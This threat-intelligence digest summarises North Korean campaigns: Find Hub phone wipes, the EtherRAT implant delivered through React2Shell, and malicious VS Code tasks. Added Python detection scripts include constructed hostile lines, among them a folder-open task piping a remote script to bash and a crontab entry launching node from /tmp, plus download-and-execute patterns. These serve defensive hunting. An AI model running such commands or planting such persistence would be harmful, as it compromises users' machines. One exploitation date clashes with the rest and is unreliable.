First reported: 11.11.2025 02:46 · 3 sources, 3 articles
- APT37 hackers abuse Google Find Hub in Android data-wiping attacks — www.bleepingcomputer.com — 11.11.2025 02:46
- Kimsuky APT Takes Over South Korean Androids, Abuses KakaoTalk — www.darkreading.com — 11.11.2025 13:40
- Android Devices Targeted By KONNI APT in Find Hub Exploitation — www.infosecurity-magazine.com — 11.11.2025 18:45
- The attack chain begins with spear-phishing messages spoofing South Korea’s National Tax Service, police, or other agencies, delivering a digitally signed MSI attachment that invokes a decoy error.vbs script and an install.bat file.
First reported: 11.11.2025 02:46 · 2 sources, 2 articles
- APT37 hackers abuse Google Find Hub in Android data-wiping attacks — www.bleepingcomputer.com — 11.11.2025 02:46
- Kimsuky APT Takes Over South Korean Androids, Abuses KakaoTalk — www.darkreading.com — 11.11.2025 13:40
- The BAT file triggers an AutoIt script (IoKITr.au3) that establishes persistence via a scheduled task, fetches additional modules from the C2, and deploys RemcosRAT, QuasarRAT, or RftRAT for credential harvesting.
First reported: 11.11.2025 02:46 · 2 sources, 2 articles
- APT37 hackers abuse Google Find Hub in Android data-wiping attacks — www.bleepingcomputer.com — 11.11.2025 02:46
- Kimsuky APT Takes Over South Korean Androids, Abuses KakaoTalk — www.darkreading.com — 11.11.2025 13:40
- Compromised Google accounts are used to log into Find Hub, retrieve registered Android devices, query GPS locations, and execute remote wipe commands.
First reported: 11.11.2025 02:46 · 2 sources, 2 articles
- APT37 hackers abuse Google Find Hub in Android data-wiping attacks — www.bleepingcomputer.com — 11.11.2025 02:46
- Kimsuky APT Takes Over South Korean Androids, Abuses KakaoTalk — www.darkreading.com — 11.11.2025 13:40
- The attacker hijacks the victim’s KakaoTalk PC session post-wipe to distribute malicious files to the victim’s contacts, amplifying the attack’s spread.
First reported: 11.11.2025 02:46 · 3 sources, 3 articles
- APT37 hackers abuse Google Find Hub in Android data-wiping attacks — www.bleepingcomputer.com — 11.11.2025 02:46
- Kimsuky APT Takes Over South Korean Androids, Abuses KakaoTalk — www.darkreading.com — 11.11.2025 13:40
- Android Devices Targeted By KONNI APT in Find Hub Exploitation — www.infosecurity-magazine.com — 11.11.2025 18:45
- The September 5 attack targeted a South Korean counselor specializing in psychological support for North Korean defector youth, using a malicious file disguised as a 'stress relief program'.
First reported: 11.11.2025 02:46 · 3 sources, 3 articles
- APT37 hackers abuse Google Find Hub in Android data-wiping attacks — www.bleepingcomputer.com — 11.11.2025 02:46
- Kimsuky APT Takes Over South Korean Androids, Abuses KakaoTalk — www.darkreading.com — 11.11.2025 13:40
- Android Devices Targeted By KONNI APT in Find Hub Exploitation — www.infosecurity-magazine.com — 11.11.2025 18:45
- A second attack on September 15 used the same method, confirming a pattern of targeting high-value individuals in South Korea.
First reported: 11.11.2025 02:46 · 3 sources, 3 articles
- APT37 hackers abuse Google Find Hub in Android data-wiping attacks — www.bleepingcomputer.com — 11.11.2025 02:46
- Kimsuky APT Takes Over South Korean Androids, Abuses KakaoTalk — www.darkreading.com — 11.11.2025 13:40
- Android Devices Targeted By KONNI APT in Find Hub Exploitation — www.infosecurity-magazine.com — 11.11.2025 18:45
- The Konni campaign exploited Google's Find Hub service to remotely reset Android devices, marking the first known instance of a North Korean APT abusing this feature for malicious purposes.
First reported: 11.11.2025 13:40 · 2 sources, 2 articles
- Kimsuky APT Takes Over South Korean Androids, Abuses KakaoTalk — www.darkreading.com — 11.11.2025 13:40
- Android Devices Targeted By KONNI APT in Find Hub Exploitation — www.infosecurity-magazine.com — 11.11.2025 18:45
- The attack chain involved a two-stage process: initial spear-phishing targeting Android devices (beginning July 2024) followed by secondary malware distribution via compromised KakaoTalk PC sessions.
First reported: 11.11.2025 13:40 · 2 sources, 2 articles
- Kimsuky APT Takes Over South Korean Androids, Abuses KakaoTalk — www.darkreading.com — 11.11.2025 13:40
- Android Devices Targeted By KONNI APT in Find Hub Exploitation — www.infosecurity-magazine.com — 11.11.2025 18:45
- Attackers compromised the KakaoTalk account of a psychological counselor specializing in North Korean defector support on September 5, 2025, using the account to distribute malicious files disguised as a 'stress relief program' to defectors.
First reported: 11.11.2025 13:40 · 2 sources, 2 articles
- Kimsuky APT Takes Over South Korean Androids, Abuses KakaoTalk — www.darkreading.com — 11.11.2025 13:40
- Android Devices Targeted By KONNI APT in Find Hub Exploitation — www.infosecurity-magazine.com — 11.11.2025 18:45
- The remote reset of Android devices was timed to block notifications and delay victim awareness, amplifying the attack's impact by severing communication channels.
First reported: 11.11.2025 13:40 · 2 sources, 2 articles
- Kimsuky APT Takes Over South Korean Androids, Abuses KakaoTalk — www.darkreading.com — 11.11.2025 13:40
- Android Devices Targeted By KONNI APT in Find Hub Exploitation — www.infosecurity-magazine.com — 11.11.2025 18:45
- On September 15, 2025, a separate victim's KakaoTalk account was used to distribute similar malicious files en masse, indicating a coordinated wave of secondary infections.
First reported: 11.11.2025 13:40 · 2 sources, 2 articles
- Kimsuky APT Takes Over South Korean Androids, Abuses KakaoTalk — www.darkreading.com — 11.11.2025 13:40
- Android Devices Targeted By KONNI APT in Find Hub Exploitation — www.infosecurity-magazine.com — 11.11.2025 18:45
- The malicious files distributed included AutoIt scripts and modules enabling remote access, keylogging, and deployment of RATs such as LilithRAT and RemcosRAT.
First reported: 11.11.2025 13:40 · 2 sources, 2 articles
- Kimsuky APT Takes Over South Korean Androids, Abuses KakaoTalk — www.darkreading.com — 11.11.2025 13:40
- Android Devices Targeted By KONNI APT in Find Hub Exploitation — www.infosecurity-magazine.com — 11.11.2025 18:45
-
Attackers exfiltrated large volumes of PII, sensitive data, and private content (including webcam captures) from compromised PCs, leveraging internal reconnaissance for prolonged data collection.
First reported: 11.11.2025 13:40 · 2 sources, 2 articles
- Kimsuky APT Takes Over South Korean Androids, Abuses KakaoTalk — www.darkreading.com — 11.11.2025 13:40
- Android Devices Targeted By KONNI APT in Find Hub Exploitation — www.infosecurity-magazine.com — 11.11.2025 18:45

In the KONNI APT campaign that abused Google’s Find Hub service, a digitally signed MSI installer named 'Stress Clear.msi' was used to distribute AutoIt loaders disguised as stress-relief apps.
First reported: 11.11.2025 18:45 · 1 source, 1 article
- Android Devices Targeted By KONNI APT in Find Hub Exploitation — www.infosecurity-magazine.com — 11.11.2025 18:45

The AutoIt loader established persistence by copying executables to the public Music folder and registering a scheduled task.
First reported: 11.11.2025 18:45 · 1 source, 1 article
- Android Devices Targeted By KONNI APT in Find Hub Exploitation — www.infosecurity-magazine.com — 11.11.2025 18:45

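A hunt for this persistence pattern, as an added example that is not part of the original report or the researchers' tooling: it parses the verbose CSV output of `schtasks /query /fo CSV /v` and flags any scheduled task whose action runs from a user-writable folder such as C:\Users\Public or a Temp directory. The CSV below is constructed; the task name and the dropped file name (`update.exe`) are placeholders, since the report only names the installer 'Stress Clear.msi'.

```python
import csv
import io

# Constructed sample of `schtasks /query /fo CSV /v` output (not telemetry
# from the campaign). Task names and the dropped file name are placeholders;
# only the "TaskName" and "Task To Run" columns matter to the check.
SAMPLE_SCHTASKS_CSV = r'''
"HostName","TaskName","Next Run Time","Status","Logon Mode","Last Run Time","Last Result","Author","Task To Run"
"WS01","\Microsoft\Windows\Defrag\ScheduledDefrag","N/A","Ready","Interactive/Background","N/A","0","Microsoft","%windir%\system32\defrag.exe -c -h -k -g -$"
"WS01","\StressClearUpdate","11/12/2025 9:00:00 AM","Ready","Interactive only","N/A","0","WS01\user","C:\Users\Public\Music\update.exe /silent"
"WS01","\OneDrive Standalone Update","N/A","Ready","Interactive only","N/A","0","WS01\user","C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe"
'''.strip()

# User-writable locations that have no business hosting a scheduled task's
# binary; the campaign used the public Music folder.
SUSPICIOUS_PATH_FRAGMENTS = ("\\users\\public\\", "\\temp\\")


def find_suspicious_tasks(schtasks_csv: str) -> list[dict]:
    """Return scheduled tasks whose action runs from a user-writable location."""
    findings = []
    for row in csv.DictReader(io.StringIO(schtasks_csv)):
        action = (row.get("Task To Run") or "").strip()
        lowered = action.lower()
        hits = [frag for frag in SUSPICIOUS_PATH_FRAGMENTS if frag in lowered]
        if hits:
            findings.append({"task": row["TaskName"], "action": action,
                             "matched": [h.strip("\\") for h in hits]})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_tasks(SAMPLE_SCHTASKS_CSV):
        print(f"{f['task']}: {f['action']}  (matched {', '.join(f['matched'])})")
```

On a live host the CSV comes from running `schtasks /query /fo CSV /v` and feeding its output to `find_suspicious_tasks`; a match is a lead to triage (author, creation time, file hash), not proof of compromise on its own.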
Attackers used stolen Google account credentials to track victims’ real-time locations via Find Hub and triggered remote wipe commands only when targets were confirmed to be away.
First reported: 11.11.2025 18:45 · 1 source, 1 article
- Android Devices Targeted By KONNI APT in Find Hub Exploitation — www.infosecurity-magazine.com — 11.11.2025 18:45

The MSI installer’s setup routine deleted traces to hinder forensic analysis, while AutoIt scripts disguised as error dialogs maintained continuous C2 communication.
First reported: 11.11.2025 18:45 · 1 source, 1 article
- Android Devices Targeted By KONNI APT in Find Hub Exploitation — www.infosecurity-magazine.com — 11.11.2025 18:45

The campaign employed a two-stage process: spear-phishing via KakaoTalk to compromise PCs, followed by remote wipe of Android devices to sever communication channels and erase forensic evidence.
First reported: 11.11.2025 18:45 · 1 source, 1 article
- Android Devices Targeted By KONNI APT in Find Hub Exploitation — www.infosecurity-magazine.com — 11.11.2025 18:45

EtherRAT is a new Linux malware implant deployed by exploiting the React2Shell vulnerability (CVE-2025-55182) in Next.js applications as the first step of a multi-stage attack chain.
First reported: 09.12.2025 17:43 · 2 sources, 2 articles
- North Korean hackers exploit React2Shell flaw in EtherRAT malware attacks — www.bleepingcomputer.com — 09.12.2025 17:43
- North Korea-linked Actors Exploit React2Shell to Deploy New EtherRAT Malware — thehackernews.com — 09.12.2025 20:25

EtherRAT uses five distinct Linux persistence mechanisms: cron jobs, bashrc injection, XDG autostart, systemd user service, and profile injection.
First reported: 09.12.2025 17:43 · 3 sources, 3 articles
- North Korean hackers exploit React2Shell flaw in EtherRAT malware attacks — www.bleepingcomputer.com — 09.12.2025 17:43
- React2Shell Exploit Campaigns Tied to North Korean Cyber Intrusion Tactics — www.infosecurity-magazine.com — 09.12.2025 19:15
- North Korea-linked Actors Exploit React2Shell to Deploy New EtherRAT Malware — thehackernews.com — 09.12.2025 20:25

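As an added example (not EtherRAT code and not the researchers' detection content), a Python audit of the five user-level persistence locations listed above, run against a throwaway home directory seeded with constructed entries. The indicator it looks for, a `node` binary launched from /tmp, /dev/shm, /var/tmp or a hidden directory, is an assumption chosen for the example rather than a published EtherRAT indicator; the file names and paths in the sample are made up.

```python
import re
import tempfile
from pathlib import Path

# A line is flagged when it launches a `node` binary from a location a
# package manager would never install to: /tmp, /dev/shm, /var/tmp or a
# hidden directory. Both patterns are assumptions of this example.
NODE_RE = re.compile(r"(?:^|[\s/=\"'])node(?:\b|\s)")
USER_PATH_RE = re.compile(r"/(?:tmp|dev/shm|var/tmp)/|/\.[A-Za-z0-9_.-]+/")


def suspicious_line(line: str) -> bool:
    stripped = line.strip()
    if not stripped or stripped.startswith("#"):
        return False
    return bool(NODE_RE.search(stripped)) and bool(USER_PATH_RE.search(stripped))


def audit_user_persistence(home: Path, crontab_text: str) -> list[dict]:
    """Scan the five user-level persistence locations named in the report."""
    findings: list[dict] = []

    def scan(kind: str, label: str, text: str) -> None:
        for lineno, line in enumerate(text.splitlines(), 1):
            if suspicious_line(line):
                findings.append({"kind": kind, "where": f"{label}:{lineno}", "line": line.strip()})

    scan("crontab", "crontab", crontab_text)            # text of `crontab -l`
    for name in (".bashrc", ".bash_profile"):
        if (home / name).is_file():
            scan("bashrc", str(home / name), (home / name).read_text())
    if (home / ".profile").is_file():
        scan("profile", str(home / ".profile"), (home / ".profile").read_text())
    for p in sorted((home / ".config" / "autostart").glob("*.desktop")):
        scan("xdg-autostart", str(p), p.read_text())
    for p in sorted((home / ".config" / "systemd" / "user").glob("*.service")):
        scan("systemd-user", str(p), p.read_text())
    return findings


def build_sample_home() -> tuple[Path, str]:
    """Create a throwaway home directory with constructed entries: one benign
    and one suspicious line per location. All paths and names are made up."""
    home = Path(tempfile.mkdtemp(prefix="persist-audit-"))
    (home / ".bashrc").write_text(
        'export NVM_DIR="$HOME/.nvm"\n'
        "nohup $HOME/.cache/.n/node $HOME/.cache/.n/main.js >/dev/null 2>&1 &\n")
    (home / ".profile").write_text(
        'export PATH="$HOME/.local/bin:$PATH"\n'
        "/home/user/.cache/.n/node /home/user/.cache/.n/main.js &\n")
    autostart = home / ".config" / "autostart"
    autostart.mkdir(parents=True)
    (autostart / "nm-applet.desktop").write_text(
        "[Desktop Entry]\nType=Application\nExec=nm-applet\n")
    (autostart / "sys-update.desktop").write_text(
        "[Desktop Entry]\nType=Application\n"
        "Exec=/home/user/.config/.sys/node /home/user/.config/.sys/app.js\n")
    units = home / ".config" / "systemd" / "user"
    units.mkdir(parents=True)
    (units / "sys-update.service").write_text(
        "[Service]\nExecStart=/home/user/.local/share/.rt/node /home/user/.local/share/.rt/index.js\n"
        "Restart=always\n")
    crontab = "0 3 * * * /usr/bin/backup.sh\n@reboot /tmp/.x/node /tmp/.x/a.js\n"
    return home, crontab


if __name__ == "__main__":
    sample_home, sample_crontab = build_sample_home()
    for f in audit_user_persistence(sample_home, sample_crontab):
        print(f"[{f['kind']}] {f['where']}: {f['line']}")
```

For a real host, pass `Path.home()` and the output of `crontab -l`; because the implant re-establishes all five at once, a single hit in any location is a reason to check the other four immediately.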
The malware leverages Ethereum smart contracts for C2 communication, querying nine public Ethereum RPC providers in parallel to prevent single-node poisoning or sinkholing.
First reported: 09.12.2025 17:43 · 3 sources, 3 articles
- North Korean hackers exploit React2Shell flaw in EtherRAT malware attacks — www.bleepingcomputer.com — 09.12.2025 17:43
- React2Shell Exploit Campaigns Tied to North Korean Cyber Intrusion Tactics — www.infosecurity-magazine.com — 09.12.2025 19:15
- North Korea-linked Actors Exploit React2Shell to Deploy New EtherRAT Malware — thehackernews.com — 09.12.2025 20:25

EtherRAT employs a self-updating mechanism by sending its source code to an API endpoint, receiving obfuscated replacement code to evade static detection.
First reported: 09.12.2025 17:43 · 3 sources, 3 articles
- North Korean hackers exploit React2Shell flaw in EtherRAT malware attacks — www.bleepingcomputer.com — 09.12.2025 17:43
- React2Shell Exploit Campaigns Tied to North Korean Cyber Intrusion Tactics — www.infosecurity-magazine.com — 09.12.2025 19:15
- North Korea-linked Actors Exploit React2Shell to Deploy New EtherRAT Malware — thehackernews.com — 09.12.2025 20:25

The attack chain begins with React2Shell exploitation to execute a base64-encoded shell command, downloading a malicious script (s.sh) that fetches a Node.js runtime and deploys an obfuscated JavaScript dropper.
First reported: 09.12.2025 17:43 · 3 sources, 3 articles
- North Korean hackers exploit React2Shell flaw in EtherRAT malware attacks — www.bleepingcomputer.com — 09.12.2025 17:43
- React2Shell Exploit Campaigns Tied to North Korean Cyber Intrusion Tactics — www.infosecurity-magazine.com — 09.12.2025 19:15
- North Korea-linked Actors Exploit React2Shell to Deploy New EtherRAT Malware — thehackernews.com — 09.12.2025 20:25

EtherRAT's encrypted loader pattern closely resembles the DPRK-affiliated BeaverTail malware used in Contagious Interview campaigns, suggesting a shared development lineage.
First reported: 09.12.2025 17:43 · 3 sources, 3 articles
- North Korean hackers exploit React2Shell flaw in EtherRAT malware attacks — www.bleepingcomputer.com — 09.12.2025 17:43
- React2Shell Exploit Campaigns Tied to North Korean Cyber Intrusion Tactics — www.infosecurity-magazine.com — 09.12.2025 19:15
- North Korea-linked Actors Exploit React2Shell to Deploy New EtherRAT Malware — thehackernews.com — 09.12.2025 20:25

The malware executes JavaScript payloads returned from C2 every 500 ms using an AsyncFunction constructor, functioning as a fully interactive Node.js shell.
First reported: 09.12.2025 17:43 · 3 sources, 3 articles
- North Korean hackers exploit React2Shell flaw in EtherRAT malware attacks — www.bleepingcomputer.com — 09.12.2025 17:43
- React2Shell Exploit Campaigns Tied to North Korean Cyber Intrusion Tactics — www.infosecurity-magazine.com — 09.12.2025 19:15
- North Korea-linked Actors Exploit React2Shell to Deploy New EtherRAT Malware — thehackernews.com — 09.12.2025 20:25

EtherRAT was recovered from a compromised Next.js application just two days after the public disclosure of CVE-2025-55182, indicating rapid weaponization by North Korean actors.
First reported: 09.12.2025 17:43 · 3 sources, 3 articles
- North Korean hackers exploit React2Shell flaw in EtherRAT malware attacks — www.bleepingcomputer.com — 09.12.2025 17:43
- React2Shell Exploit Campaigns Tied to North Korean Cyber Intrusion Tactics — www.infosecurity-magazine.com — 09.12.2025 19:15
- North Korea-linked Actors Exploit React2Shell to Deploy New EtherRAT Malware — thehackernews.com — 09.12.2025 20:25

EtherRAT queries nine public Ethereum RPC endpoints in parallel and uses a consensus mechanism to select the C2 URL returned by the majority, preventing sinkholing or poisoning by a single compromised node.
First reported: 09.12.2025 20:25 · 1 source, 1 article
- North Korea-linked Actors Exploit React2Shell to Deploy New EtherRAT Malware — thehackernews.com — 09.12.2025 20:25

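Because the implant takes the majority answer of nine providers (described at two points above), blocking or seizing any single RPC endpoint changes nothing; what a network defender can see instead is the traffic shape: one host issuing near-simultaneous contract-read calls to many different providers. The added example below, which is not from the report or the researchers, applies that idea to constructed egress-proxy records. It assumes the contract reads use the standard Ethereum JSON-RPC read methods `eth_call`, `eth_getLogs` or `eth_getStorageAt`, which the page does not state, and the provider hostnames are placeholders.

```python
import json
from collections import defaultdict

# Standard Ethereum JSON-RPC read methods; that EtherRAT uses exactly these
# is an assumption of this example, not a statement from the report.
CONTRACT_READ_METHODS = {"eth_call", "eth_getLogs", "eth_getStorageAt"}


def rpc_record(ts: float, src: str, dst: str, rpc_method: str) -> dict:
    body = {"jsonrpc": "2.0", "method": rpc_method, "params": [], "id": 1}
    return {"ts": ts, "src": src, "dst": dst, "method": "POST", "body": json.dumps(body)}


def build_sample_log() -> str:
    """Constructed egress-proxy records as JSON lines; hostnames are placeholders."""
    recs = []
    for k in range(9):                       # nine near-simultaneous contract reads
        recs.append(rpc_record(1000.0 + 0.03 * k, "10.0.5.21", f"rpc-{k}.example", "eth_call"))
    recs.append(rpc_record(1000.5, "10.0.7.8", "rpc-0.example", "eth_call"))      # a developer
    recs.append(rpc_record(1090.0, "10.0.7.8", "rpc-1.example", "eth_getLogs"))   # ...minutes apart
    recs.append({"ts": 1001.0, "src": "10.0.5.21", "dst": "chat.example",        # unrelated POST
                 "method": "POST", "body": '{"text":"hi"}'})
    return "\n".join(json.dumps(r) for r in recs)


def detect_rpc_fanout(log_text: str, window_s: float = 5.0, min_hosts: int = 5) -> list[dict]:
    """Alert when one source reaches >= min_hosts distinct providers with
    contract-read calls inside window_s seconds (5 is a majority of 9)."""
    by_src = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        if rec.get("method") != "POST":
            continue
        try:
            body = json.loads(rec.get("body", ""))
        except json.JSONDecodeError:
            continue                         # not a JSON body, so not JSON-RPC
        if (isinstance(body, dict) and body.get("jsonrpc") == "2.0"
                and body.get("method") in CONTRACT_READ_METHODS):
            by_src[rec["src"]].append((float(rec["ts"]), rec["dst"]))

    alerts = []
    for src, events in by_src.items():
        events.sort()
        i = 0
        while i < len(events):
            t0, hosts, j = events[i][0], set(), i
            while j < len(events) and events[j][0] - t0 <= window_s:
                hosts.add(events[j][1])
                j += 1
            if len(hosts) >= min_hosts:
                alerts.append({"src": src, "start": t0, "hosts": sorted(hosts)})
                i = j                        # skip past the window already reported
            else:
                i += 1
    return alerts


if __name__ == "__main__":
    for a in detect_rpc_fanout(build_sample_log()):
        print(f"{a['src']} reached {len(a['hosts'])} RPC providers within 5 s from t={a['start']}")
```

The threshold of five distinct providers is the smallest majority of nine; lowering it catches implants that query fewer endpoints at the cost of more noise from legitimate Web3 tooling, so the natural tuning is to restrict the rule to server subnets that have no business reading blockchain state at all.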
The EtherRAT dropper decrypts the payload with a hard-coded key and spawns it using a downloaded Node.js v20.10.0 binary, then deletes the shell script to minimize forensic traces.
First reported: 09.12.2025 20:25 · 1 source, 1 article
- North Korea-linked Actors Exploit React2Shell to Deploy New EtherRAT Malware — thehackernews.com — 09.12.2025 20:25

EtherRAT enters a 500 ms polling loop with the C2 server, executing any response longer than 10 characters as JavaScript code on the infected machine.
First reported: 09.12.2025 20:25 · 1 source, 1 article
- North Korea-linked Actors Exploit React2Shell to Deploy New EtherRAT Malware — thehackernews.com — 09.12.2025 20:25

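A poll every 500 ms with no randomized sleep, as described in the two items above, is a strong beaconing signal on the wire. The added example below, which is not part of the report, computes the coefficient of variation of inter-request gaps per source/destination pair over constructed timestamps and flags pairs with many requests and almost no jitter; the thresholds (20 requests, CV of 0.10) and the hostnames are assumptions for the example.

```python
import statistics
from collections import defaultdict


def build_sample_events() -> list[tuple[float, str, str]]:
    """Constructed (timestamp, src, dst) request records, not real traffic."""
    events = []
    # implant-style poll: every 500 ms with a few milliseconds of scheduler jitter
    t = 0.0
    for i in range(60):
        events.append((round(t, 3), "10.0.5.21", "c2-placeholder.example"))
        t += 0.5 + (0.004 if i % 3 == 0 else -0.002)
    # a person browsing: bursts of requests separated by long, irregular pauses
    t = 0.0
    for gap in (0.1, 0.2, 3.5, 0.05, 12.0, 0.3, 0.1, 45.0, 0.2, 0.6, 8.0,
                0.1, 0.05, 0.07, 22.0, 1.5, 0.4, 0.2, 0.9, 5.0, 0.3):
        t += gap
        events.append((round(t, 3), "10.0.7.8", "news.example"))
    return events


def beacon_candidates(events, min_requests: int = 20, max_cv: float = 0.10) -> list[dict]:
    """Flag (src, dst) pairs whose inter-request gaps are nearly constant.
    Thresholds are assumptions for this example."""
    by_pair = defaultdict(list)
    for ts, src, dst in events:
        by_pair[(src, dst)].append(ts)
    candidates = []
    for (src, dst), times in by_pair.items():
        if len(times) < min_requests:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        mean = statistics.fmean(gaps)
        if mean <= 0:
            continue
        cv = statistics.pstdev(gaps) / mean   # coefficient of variation of the gaps
        if cv <= max_cv:
            candidates.append({"src": src, "dst": dst, "count": len(times),
                               "mean_gap_s": round(mean, 3), "cv": round(cv, 4)})
    return candidates


if __name__ == "__main__":
    for c in beacon_candidates(build_sample_events()):
        print(f"{c['src']} -> {c['dst']}: {c['count']} requests, "
              f"mean gap {c['mean_gap_s']} s, CV {c['cv']}")
```

On real proxy or flow data the interesting output is the pair list sorted by CV ascending; a half-second cadence sustained for minutes from a web server that should only receive connections is hard to explain by anything other than an implant polling its controller.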
Contagious Interview has shifted tactics to lure victims into cloning malicious repositories on GitHub/GitLab/Bitbucket, using VS Code's auto-run tasks.json to execute a loader script upon project opening.
First reported: 09.12.2025 20:25 · 1 source, 1 article
- North Korea-linked Actors Exploit React2Shell to Deploy New EtherRAT Malware — thehackernews.com — 09.12.2025 20:25

The VS Code-based attack chain downloads a 'vscode-bootstrap.sh' script that fetches 'package.json' and 'env-setup.js', which serve as launchpads for BeaverTail and InvisibleFerret malware.
First reported: 09.12.2025 20:25 · 1 source, 1 article
- North Korea-linked Actors Exploit React2Shell to Deploy New EtherRAT Malware — thehackernews.com — 09.12.2025 20:25

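A pre-open audit of a cloned repository's `.vscode/tasks.json`, as an added example that is not part of the original report and covers both items above: it parses the JSONC dialect VS Code accepts (comments and trailing commas), reports every task with `"runOptions": {"runOn": "folderOpen"}`, and adds reasons when the command downloads and runs remote content or hides its terminal. The sample file is constructed; its URL, labels and commands are placeholders rather than the campaign's files.

```python
import json
import re

# Constructed tasks.json in VS Code's JSONC dialect. The URL, labels and
# commands are placeholders, not files recovered from the campaign.
SAMPLE_TASKS_JSON = r'''{
    // constructed example, not a file recovered from the campaign
    "version": "2.0.0",
    "tasks": [
        {
            "label": "build",
            "type": "shell",
            "command": "npm run build",
            "group": "build",
        },
        {
            "label": "Setup environment",
            "type": "shell",
            "command": "curl -fsSL https://bootstrap.example/vscode-bootstrap.sh | bash",
            "runOptions": { "runOn": "folderOpen" },
            "presentation": { "reveal": "silent" }, /* keep the terminal hidden */
        },
    ],
}'''

# "fetch something, then hand it to an interpreter" heuristic (an assumption
# of this example, not a published rule).
DOWNLOAD_EXEC_RE = re.compile(r"\b(?:curl|wget)\b.*\b(?:bash|sh|node|python3?)\b")


def strip_jsonc(text: str) -> str:
    """Remove // and /* */ comments outside strings, then trailing commas."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:      # keep the escaped character verbatim
                out.append(text[i + 1])
                i += 2
                continue
            in_str = c != '"'
        elif c == '"':
            in_str = True
            out.append(c)
        elif text.startswith("//", i):
            j = text.find("\n", i)
            i = n if j == -1 else j
            continue
        elif text.startswith("/*", i):
            j = text.find("*/", i + 2)
            i = n if j == -1 else j + 2
            continue
        else:
            out.append(c)
        i += 1
    # trailing-comma removal is regex-based and may also touch ",}" inside strings
    return re.sub(r",(\s*[}\]])", r"\1", "".join(out))


def audit_tasks_json(text: str) -> list[dict]:
    """Report tasks that run on folder open, with extra reasons for
    download-and-run commands and hidden terminals."""
    data = json.loads(strip_jsonc(text))
    findings = []
    for task in data.get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") != "folderOpen":
            continue
        cmd = " ".join([str(task.get("command", ""))]
                       + [str(a) for a in task.get("args", [])]).strip()
        reasons = ["runs automatically when the folder is opened"]
        if DOWNLOAD_EXEC_RE.search(cmd):
            reasons.append("command downloads and executes remote content")
        if (task.get("presentation") or {}).get("reveal") in ("silent", "never"):
            reasons.append("terminal output is hidden from the user")
        findings.append({"label": task.get("label"), "command": cmd, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_tasks_json(SAMPLE_TASKS_JSON):
        print(f"task {f['label']!r}: {f['command']}")
        for r in f["reasons"]:
            print(f"  - {r}")
```

VS Code only runs folder-open tasks after the user has allowed automatic tasks for that folder (the `task.allowAutomaticTasks` setting) and only in a trusted workspace, so leaving Workspace Trust enabled means a freshly cloned repository opens in Restricted Mode and such a task does not fire; this script is for the moment before that trust prompt is answered.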
OpenSourceMalware identified 13 versions of the VS Code campaign across 27 GitHub users and 11 BeaverTail variants, with repositories dating from April 22, 2025, to December 1, 2025.
First reported: 09.12.2025 20:25 · 1 source, 1 article
- North Korea-linked Actors Exploit React2Shell to Deploy New EtherRAT Malware — thehackernews.com — 09.12.2025 20:25

North Korean actors have consolidated their hosting infrastructure on Vercel, abandoning Fly.io, Platform.sh, and Render for Contagious Interview operations.
First reported: 09.12.2025 20:25 · 1 source, 1 article
- North Korea-linked Actors Exploit React2Shell to Deploy New EtherRAT Malware — thehackernews.com — 09.12.2025 20:25
Similar Happenings
Chinese Hackers Exploit React2Shell Vulnerability (CVE-2025-55182) in Targeted Campaigns
Two China-linked hacking groups, Earth Lamia and Jackpot Panda, have begun exploiting the newly disclosed React2Shell vulnerability (CVE-2025-55182) in React Server Components, which allows unauthenticated remote code execution. The vulnerability was addressed in React versions 19.0.1, 19.1.2, and 19.2.1. The groups have targeted various sectors, including financial services, logistics, retail, IT, universities, and government organizations across Latin America, the Middle East, and Southeast Asia. The attacks involve running discovery commands, writing files, and reading sensitive information, demonstrating a systematic approach to exploit multiple vulnerabilities simultaneously.
Critical React Server Components (RSC) Bugs Enable Unauthenticated Remote Code Execution
A critical security vulnerability (CVE-2025-55182, CVSS 10.0) in React Server Components (RSC) allows unauthenticated remote code execution due to unsafe deserialization of payloads. The flaw affects multiple versions of React and Next.js, potentially impacting any application using RSC. The issue has been patched, but 39% of cloud environments remain vulnerable. Cloudflare experienced a widespread outage due to an emergency patch for this vulnerability, and multiple China-linked hacking groups have begun exploiting it. NHS England National CSOC has warned of the likelihood of continued exploitation in the wild. Major companies such as Google Cloud, AWS, and Cloudflare immediately responded to the vulnerability. The security researcher Lachlan Davidson disclosed the vulnerability on November 29, 2025, to the Meta team. The flaw has been dubbed React2Shell, a nod to the Log4Shell vulnerability discovered in 2021. The US National Vulnerability Database (NVD) rejected CVE-2025-66478 as a duplicate of CVE-2025-55182. The exploitation success rate is reported to be nearly 100% in default configurations. React servers that use React Server Function endpoints are known to be vulnerable. The Next.js web application is also vulnerable in its default configuration. At the time of writing, it is unknown if active exploitation has occurred, but there have been some reports of observed exploitation activity as of December 5, 2026. OX Security warned that the flaw is now actively exploitable on December 5, around 10am GMT. Hacker maple3142 published a working PoC, and OX Security successfully verified it. JFrog identified fake proof-of-concepts (PoC) on GitHub, warning security teams to verify sources before testing. Cloudflare started investigating issues on December 5 at 08:56 UTC, and a fix was rolled out within half an hour, but by that time outages had been reported by several major internet services, including Zoom, LinkedIn, Coinbase, DoorDash, and Canva. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog on December 6, 2025, following confirmed active exploitation.
The vulnerability is tracked as React2Shell and is related to a remote code execution flaw in React Server Components (RSC). The flaw is due to insecure deserialization in the Flight protocol used by React to communicate between a server and client. The vulnerability affects versions 19.0, 19.1.0, 19.1.1, and 19.2.0 of react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack. Patched versions of React are 19.0.1, 19.1.2, and 19.2.1. Downstream frameworks impacted include Next.js, React Router, Waku, Parcel, Vite, and RedwoodSDK. Amazon reported attack attempts from Chinese hacking groups like Earth Lamia and Jackpot Panda within hours of public disclosure. Coalition, Fastly, GreyNoise, VulnCheck, and Wiz reported seeing exploitation efforts targeting the flaw. Some attacks involved the deployment of cryptocurrency miners and the execution of "cheap math" PowerShell commands. Censys identified about 2.15 million instances of internet-facing services potentially affected by the vulnerability. Palo Alto Networks Unit 42 confirmed over 30 affected organizations across numerous sectors, with activity consistent with Chinese hacking group UNC5174. Security researcher Lachlan Davidson released multiple proof-of-concept 